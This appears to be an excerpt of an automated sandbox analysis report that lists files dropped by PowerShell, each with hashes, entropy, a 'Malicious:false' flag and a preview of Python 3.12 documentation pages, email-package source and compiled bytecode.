                                                                                                                                                                                                              SHA-512:76A219F9B17C2DDB9F3C4C7CE8175EC06875937CA039792FF7CA15677E9FDC91770719892356D98D11A19820E239EC6E78EBA7BBF78B730510C44F933F422CA3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="gzip . Support for gzip files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/gzip.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/gzip.py This module provides a simple interface to compress and decompress files just like the GNU programs gzip and gunzip would. The data compression is provided by the zlib modu..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/gzip.py This module provides a simp
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2929), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):118917
                                                                                                                                                                                                              Entropy (8bit):4.925140357584673
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:s0GqyICMqyHEF4UhV9bw82w2rhC2JGhC2bJhC23AhC2Q4hC2pZhC2cnhC2HuhC2l:1EF4fhcMZF9y+aA
                                                                                                                                                                                                              MD5:4F59B4F4B90C5E5A4A06E570EC8FFE8D
                                                                                                                                                                                                              SHA1:34D425DFCDDAFF4CB573DDF613AD85A0626E07A3
                                                                                                                                                                                                              SHA-256:FB61833B5414D38DE8F98D47F24AE92CFABAE325A6544F60D1FEA806E2EDC232
                                                                                                                                                                                                              SHA-512:A6E642D4C31CABFADB964002AF50C2A55C2C8C1074AE502468940F19CC41337E76E885F0EB4FD9675F1D818980809ABCA2A58BB77353E61EAFFAEECBF3CFDE8C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="hashlib . Secure hashes and message digests" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/hashlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/hashlib.py This module implements a common interface to many different secure hash and message digest algorithms. Included are the FIPS secure hash algorithms SHA1, SHA224, SHA256,..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/hashlib.py This mo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (819), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):46727
                                                                                                                                                                                                              Entropy (8bit):4.824703982366281
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:XNrqywhgMMCZyFmc7KmE+mcI7Ou5mcwerNPMyF9yYQqmpIoNQNMyFCRwQNMyFCrw:XNrqy7MMCZyFmc7KmE+mcI7Ou5mcwerK
                                                                                                                                                                                                              MD5:93579E244B17DA13D4F81CE2163C2517
                                                                                                                                                                                                              SHA1:0983368A7D0869A6FAB0C64CEBB906F71F8DF8F5
                                                                                                                                                                                                              SHA-256:B22B3B87B44A00E8274ABC390311BFDE56B67F70F210C25CAF5BDD04457E92E3
                                                                                                                                                                                                              SHA-512:3BFA09CC2BB01409FBA85957D982442A061A4373A616626988FE2C64E2364D38A04288E15631D4E8FF5FD47667CF592ABDFE52B992C1C7D6B5F03000A8F4FCD2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="heapq . Heap queue algorithm" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/heapq.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/heapq.py This module provides an implementation of the heap queue algorithm, also known as the priority queue algorithm. Heaps are binary trees for which every parent node has a va..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/heapq.py This module provides an im
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (538), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27854
                                                                                                                                                                                                              Entropy (8bit):4.895822280579292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:TtGTqy9KIVgMIeC1951Xvez5aDNOX+zYx+YBifvtMucJjxhvfPK97eMK762/:TtUqymMIeM951XWz5aDNOX+zQ++ifvtQ
                                                                                                                                                                                                              MD5:3C0D3FF88B1676C09890A591BA29655D
                                                                                                                                                                                                              SHA1:2197AF154DAF0BDFED63C26070DD9257B00589E9
                                                                                                                                                                                                              SHA-256:9E7BF6BD571228C2589AFCC304A1AB06A44135A134C9A12CDA0893F84CECF176
                                                                                                                                                                                                              SHA-512:22E11CC9AEB72B90ADBA8923E118A063A1EA5088F3744F9DBDA8604D54994A39EEB5664E60D1E4031CD8864E6D399347FD155714AA9F4BD0319C3825FBE959DE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="hmac . Keyed-Hashing for Message Authentication" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/hmac.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/hmac.py This module implements the HMAC algorithm as described by RFC 2104. An HMAC object has the following methods: A hash object has the following attributes: This module also p..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/hmac.py This modu
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (640), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18287
                                                                                                                                                                                                              Entropy (8bit):4.881876337548804
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:NeseYHqklZ5AnGTMab//yxQHEf/5dJIvIEQnUTMQ76zqWTC:HqyZOsMaD/kKEf/5d8INaMQ762/
                                                                                                                                                                                                              MD5:CE5F87C20364EF102920BD3DCCA0DDC1
                                                                                                                                                                                                              SHA1:90BE607A1FE9B44AC31070C093FC1069B5ECD825
                                                                                                                                                                                                              SHA-256:3BB2376EFCA5EFC6B372FB6C68BD244947ED6A88732768685310F7C276A5FE91
                                                                                                                                                                                                              SHA-512:4D909EE099110AA3EC8559E26D1EB8ED5CB3467765EFF207030B6D2E7737C0E373AF91EA7DF37777EDA9F925B066EEB3E852FF665A8BFAC4DD9F0B470B10DE8E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="html.entities . Definitions of HTML general entities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/html.entities.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/html/entities.py This module defines four dictionaries, html5, name2codepoint, codepoint2name, and entitydefs. Footnotes 1, See https://html.spec.whatwg.org/multipage/named-charact..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/htm
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (566), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17981
                                                                                                                                                                                                              Entropy (8bit):4.889829505417438
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:SbaALHqklg4gnhTMy2bNIXvyT3BDXPVuSi2t9wn1TMW76zqWTC:yqyg/lMy2hIXvyTxDXq2tSxMW762/
                                                                                                                                                                                                              MD5:09259AA00A4FDDC9600BC1C6005387CB
                                                                                                                                                                                                              SHA1:516C74D31156C702C2FC9D27142B1F9103B5CC07
                                                                                                                                                                                                              SHA-256:80C8C2ACDA6AFFEC5A8FA35353B292813C0665E526A4A4C45025F1BC0C2203DD
                                                                                                                                                                                                              SHA-512:AA39E4DC86F94B5C4E485E023BC5E8EA1459598067C640CAF738FEC93106FD8011BADF02D494D73CEF6AB44E7AEBF5DA38BAB5ED84C69F5E58FC9301E6D2A736
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="html . HyperText Markup Language support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/html.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/html/__init__.py This module defines utilities to manipulate HTML. Submodules in the html package are: html.parser . HTML/XHTML parser with lenient parsing mode, html.entities . HT..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/html/__init__.py Thi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (679), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52051
                                                                                                                                                                                                              Entropy (8bit):4.897553080030299
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:QqyvMW22ohNFyTB93Dx1DrkPxfJIoFuCS+8K37/KKpK3kck/SbbnbgrkZc09HkaD:W2GbRaA
                                                                                                                                                                                                              MD5:11B1F8B167E4740AC48778569D1CE8E0
                                                                                                                                                                                                              SHA1:BA30C178456BD6EB4E0D8FB21BA0324D209D61B0
                                                                                                                                                                                                              SHA-256:A501B76C56A4AE7E5C26715C802466F8EBAD1912A3D9131C60A9F2EF9581F52C
                                                                                                                                                                                                              SHA-512:97FF6CCED8E07C19AEE398047B2570637470B7A4F0C3ED671F8FC503B08E3BD6AD779E8F5CF01C01EC9126F09F1C5A5E16C4B0FC3CA6E8556F0A4A584D344312
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="html.parser . Simple HTML and XHTML parser" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/html.parser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/html/parser.py This module defines a class HTMLParser which serves as the basis for parsing text files formatted in HTML (HyperText Mark-up Language) and XHTML. Example HTML Parser..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/html/parser.py
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1162), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):96644
                                                                                                                                                                                                              Entropy (8bit):4.8684456120936295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Xqy0MeAPOzRTwHnJeOzZRTTwTQMgyLiyFuyFS1CS2JDc7gFYzqLyD9iNlYrnUUQ9:5z+/7astk1A
                                                                                                                                                                                                              MD5:0EC33BE05058E3EC4A390539C787C787
                                                                                                                                                                                                              SHA1:6C35CEEA2CFB4E6EB9DDC5D6353A62408F48F800
                                                                                                                                                                                                              SHA-256:D21C08507ACA9D96C509874075CAD8E26703F9B8CDD0DD19DA9C6D2747A4AFD6
                                                                                                                                                                                                              SHA-512:A927F5D67F494ECDAE976A370937065EF97DAA240074F6B7410A93ECEBDC3C67E694A4365B792F40BF4956C70A846996109F6CBCD9FE0DC6D39113ADFC760AB4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="http.client . HTTP protocol client" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/http.client.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/http/client.py This module defines classes that implement the client side of the HTTP and HTTPS protocols. It is normally not used directly . the module urllib.request uses it to h..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/http/client.py This m
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3177), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):120297
                                                                                                                                                                                                              Entropy (8bit):4.87260776864512
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tFxqyqMKVNFwOyF0OVyFcyFFyFmD71OIyFNyF4yT6yYhyFkyYByYZyTbyYVyVDyN:A9T+gcA
                                                                                                                                                                                                              MD5:DED095D283F63B0A73A025860A5C345B
                                                                                                                                                                                                              SHA1:B6BC30B1F9E62CD13FAE444FA88BA15DD21E40DD
                                                                                                                                                                                                              SHA-256:9081784FF4F47CFC727FC213DD1BEAC8AA180615183D99E07E0467A07B36E276
                                                                                                                                                                                                              SHA-512:57067D721CF03D37EDEEFC47F4501C5DCCF45CEF5E0F2143E5F31470A0B48E024C8CBBA68D2EF8DAE528F0B5A870CF917AF10E7FBBB3C599DC3B26FC4D550BC7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="http.cookiejar . Cookie handling for HTTP clients" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/http.cookiejar.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/http/cookiejar.py The http.cookiejar module defines classes for automatic handling of HTTP cookies. It is useful for accessing web sites that require small pieces of data . cookies..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/htt
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (913), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53822
                                                                                                                                                                                                              Entropy (8bit):4.890323684019239
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:BuWTqy71MLAyXNkNfXNf3hA/hS2qyF+y43y5wjuqyFO7QLJtQ/YQcTUrf1eHGR89:Buqh/A
                                                                                                                                                                                                              MD5:973220D47E8739DD09A7826A8B5E2577
                                                                                                                                                                                                              SHA1:E8403C17C8AE15677C049905A2D18CB1949B3362
                                                                                                                                                                                                              SHA-256:B46835925F802081A6CF80B088D4E562ABC0DF63F09E62D180C8E981F1760AFD
                                                                                                                                                                                                              SHA-512:B847C556C00C21B32C71ECA452E0C7D59FA8207F4EAECF2B96EAD5EE24EBBF644879B5E6C29692C9135965C2A0AFA0CA8D9286D475660F535CC314A8F4A5E473
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="http.cookies . HTTP state management" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/http.cookies.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/http/cookies.py The http.cookies module defines classes for abstracting the concept of cookies, an HTTP state management mechanism. It supports both simple string-only cookies, and..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/http/cookies.py The
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (530), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):61025
                                                                                                                                                                                                              Entropy (8bit):5.023711816643495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:2Iqycsth1MIXlFzVg5MPW/j0s+G4hnFgqlnslOLurkZhnORzAaMp5haa/K3RGYVN:pqylMI1FzfGLJciuJuTl0K64Mu762/
                                                                                                                                                                                                              MD5:13AC06E2F3AAFB65A841FC1A2C9588F4
                                                                                                                                                                                                              SHA1:6D957CDA9068EC81A66472CF2AE9A1CDA5D801F2
                                                                                                                                                                                                              SHA-256:CBD4FA7B182E2959DF8453929C145FCA700CB7E52C89425EC84C7C7B1BFBA59F
                                                                                                                                                                                                              SHA-512:8ED88249D875EB92C072DB6E3B041AB36943F3C915F975B9268F5FF283A2E3602247091929563D9B8AED1FF2C4E51B1035C9C5E3C6840273E30DBFF0F76A13BD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="http . HTTP modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/http.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/http/__init__.py http is a package that collects several modules for working with the HyperText Transfer Protocol: http.client is a low-level HTTP protocol client; for high-level U..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/http/__init__.py http is a package that colle
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1825
                                                                                                                                                                                                              Entropy (8bit):4.655187743194238
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2XvNh6MGDF/hDSvkvxnsj/axPSLxnsbXqxP0:2Xlh6MgDxnsjuPSlnsbXGP0
                                                                                                                                                                                                              MD5:03BD52E5F016DB3578053FF11252F401
                                                                                                                                                                                                              SHA1:A412CB62418071C4718A0B2F9A73BDA37AE1B567
                                                                                                                                                                                                              SHA-256:F4B71B7B51A7EEBC46BBB6470CF6DA746CBB5E9548A6BC2A57B84F451EFD9769
                                                                                                                                                                                                              SHA-512:32E0A9484851071F59B909E544E8D1992592FA6ED9E4BA97A91FA8835345ACBD4E3580E2FACF0EAC9169899AC897AA4D6B18842C354CBC3E0D5E734BDDBEB7E3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""A package for parsing, handling, and generating email messages."""....__all__ = [.. 'base64mime',.. 'charset',.. 'encoders',.. 'errors',.. 'feedparser',.. 'generator',.. 'header',.. 'iterators',.. 'message',.. 'message_from_file',.. 'message_from_binary_file',.. 'message_from_string',.. 'message_from_bytes',.. 'mime',.. 'parser',.. 'quoprimime',.. 'utils',.. ]......# Some convenience routines. Don't import Parser and Message as side-effects..# of importing email since those cascadingly import most of the rest of the..# email package...def message_from_string(s, *args, **kws):.. """Parse a string into a Message object model..... Optional _class and strict are passed to the Parser constructor... """.. from email.parser import Parser.. return Parser(*args, **kws).parsestr(s)....def message_from_bytes(s, *a
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1966
                                                                                                                                                                                                              Entropy (8bit):5.159892525549756
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:hmoh6OD9UscLNoQY2TfS1NX3wksNVqAPqN7qta:8oh6OFGo6fSf7MVqAPW7f
                                                                                                                                                                                                              MD5:E9E3F1BC4DB3ED0FB0DC58C61E662A20
                                                                                                                                                                                                              SHA1:FB56F84ABE83ABD38A5BF9F9C890EC0DCA2076D9
                                                                                                                                                                                                              SHA-256:228796314195FE320AE45172FE00F750FE17EB26246848ED9EF802821BD2B4C0
                                                                                                                                                                                                              SHA-512:B772895959B5FD5034BE9B0F28EF3CE7ED248DFC545D7406C6A4C5932550DD03E4058D658B1FCE2B4933420415D2304ACC0AAFAC200996DFD9D967D51B9022CF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e!.........................(.....d.Z.g.d...Z.d...Z.d...Z.d...Z.d...Z.y.).z?A package for parsing, handling, and generating email messages.)...base64mime..charset..encoders..errors..feedparser..generator..header..iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytes..mime..parser..quoprimime..utilsc.....................<.....d.d.l.m.}.....|.|.i.|.....j...................|.........S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr......parsestr)...s..args..kwsr....s.... .TC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\__init__.pyr....r........s".........$....4....3.....(..(....+..+.....c.....................<.....d.d.l.m.}.....|.|.i.|.....j...................|.........S.).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8353
                                                                                                                                                                                                              Entropy (8bit):5.455306186619398
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5xRpL+TEgH5n14qSWZd8h7j0Og9WaXV3N6tXNariL:5xRN+4g5n2qSWEh7j0Odaut9aG
                                                                                                                                                                                                              MD5:6E1AAE8868553506542C52325074BB13
                                                                                                                                                                                                              SHA1:CF2425A07DFF5E385777C9A6B1DE6ADD02E62AEA
                                                                                                                                                                                                              SHA-256:331C6BA9B7914DD5F6210F80AB56D010F7D38CDE71C22A4484F6D95CD6F1F1C4
                                                                                                                                                                                                              SHA-512:8385E93721FC4CFB88F3472745591289CFF8B2802DB2847236DCE8AFFDDA2BD54026962D091953B212DF307FB2D81E209E96908455C504584F9C9BD122E44435
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........eF"........................2.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z...e.j.....................e.j...................d.........j...................d...........Z.d...Z...G.d...d.e.........Z...e.........Z.d.e...e.d.........<...d...Z.d...Z.d...Z.d...Z.d...Z.e.e.d...Z.d...Z.e.e.d...Z.e.e.d...Z.d.d...Z.y.).z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c.....................f.....t.........j...................|.j...................d.........j...................................S.).N.....)...bytes..fromhex..groupr....)...ms.... .ZC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\_encoded_words.py..<lambda>r....A...s ......%.-.-........... 1. 1. 3..4.......c................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):23312
                                                                                                                                                                                                              Entropy (8bit):4.9777691624818
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:afmbf5f3fIUmqWYy9yRxl1aZqQu0xC020arasoie3lg63pqqiscdFecKXhXX8i3m:aWLm3njImE0arjZQ263pqiESt5m
                                                                                                                                                                                                              MD5:6C77B1BD3E7175EC230358A576C14AB3
                                                                                                                                                                                                              SHA1:1B03CADA91A391FC3F6E5F5EEE32CD0F487D382E
                                                                                                                                                                                                              SHA-256:0E7A0E606DD0E9B87B08A04EC7EA26CBFF1843793405EB410D8967635B160864
                                                                                                                                                                                                              SHA-512:C04E3CB24DADB49E62AE0F94E40A9BBECF6A9270C88468747F5EB5F7C3C475775E20E6775D327CFEDF9A7A81CA8493D9BAD246155E71D6BE1A8BDB1B63FA31DC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e.G.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., )...jan..feb..mar..apr..may..jun..jul..aug..sep..oct..nov..dec..january..february..march..aprilr......june..july..august..september..october..november..december)...mon..tue..wed..thu..fri..sat..sunip...i....i....i....iD...i....)...UT..UTC..GMT..Z..AST..ADT..EST..EDT..CST..CDT..MST..MDT..PST..PDTc.....................H.....t.........|.........}.|.s.y.|.d.......d.|.d.<...t.........|.........S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..ress.... .VC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\email\_parseaddr.pyr....r.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18239
                                                                                                                                                                                                              Entropy (8bit):5.1634903665427085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:hsiLR0ZPQSIBjiOai/AZupPdEGApMc5jeax0M2G7XGXWGo2r:h9Lw4rxm77em2
                                                                                                                                                                                                              MD5:2147B0465DEED06877D90AD4D9BA07AB
                                                                                                                                                                                                              SHA1:04C04C54FAFB4E5D450E3F1D23E69DC09636B8CE
                                                                                                                                                                                                              SHA-256:FCAC3FC96B6ECF0419D568BFDD68D0067D3788E0FC646E031375417D206973A8
                                                                                                                                                                                                              SHA-512:4D3C1B72AA34AA759A9EBA0527E729AAF617FA0D860C515C5F93DB314D9BDF34C252381842F9BF61308191F0909903D9752C4E207CF0668189504BC3CF817B7D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........eW<.............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.........Z.d...Z.d...Z...G.d...d.e.e.j.............................Z.e...G.d...d.e.................Z...e.........Z.y.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c.....................:.......e.Z.d.Z.d.Z...f.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
